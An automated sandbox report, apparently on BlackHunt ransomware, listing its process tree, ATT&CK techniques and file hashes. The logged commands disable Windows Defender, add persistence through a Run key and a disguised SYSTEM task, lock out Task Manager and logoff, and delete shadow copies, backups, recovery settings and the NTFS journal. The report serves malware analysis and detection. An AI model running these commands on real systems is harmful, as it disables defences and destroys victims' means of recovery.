C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:5116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3520
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5024
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4588
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe" /F2⤵PID:1448
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe" /F3⤵
- Creates scheduled task(s)
PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1368
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5044
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3376
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1768
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1008
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3500
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3608
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3560
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4904
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2552
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4296
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3876
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59dcade84fbb2533db2ee550d10f79eb5
SHA12247959a27075cba2d07ee9ed06931c07ae50dc2
SHA2562c8f536678f84f7395e9ef01267c42f7a3dcf2663e79b3c557ae100a380333e0
SHA512251ce9f6fdd9cb088490582f7d10edccab60acc65bfabb18566de0c86f1bf71902b3e2be6240e57938774d4b2f6d98d0c41e272076f831db09875f74e84b30f9
-
Filesize
12KB
MD577af8543341080847a42af976156af06
SHA1e53302d18f3faeacb17aac0bdbae442c2e165120
SHA25681b48922df64de9b5e8ceef3410ebbc86794a4a952df53c84693b7c0b5e261c7
SHA5129d980e4380c798b8f1a8231fc58fe48b3594c748eca0eb9e63480daec3b1cb725c8e8ee4d3596dd31a406b35a010958a1f32f2ae024d2a8054b1974cc4a66186
-
Filesize
684B
MD5d5dbada6b7111c0a453f769652328272
SHA1cff8367a5ae805e33924237bb4b47a41e3b78a88
SHA25617ef0ade5d7fb00dd139edf926cfe9067d05dd6930753e33b5dcb00bbdf20ce7
SHA5124b2eeb1a2b45d69f68c8f89b9cd12cf35592118fd4a19b1b8e45ad89efd0f6f3cda7253f4332d55c9613a617f570cbaac02f914a20ba29ae5ce2744487898379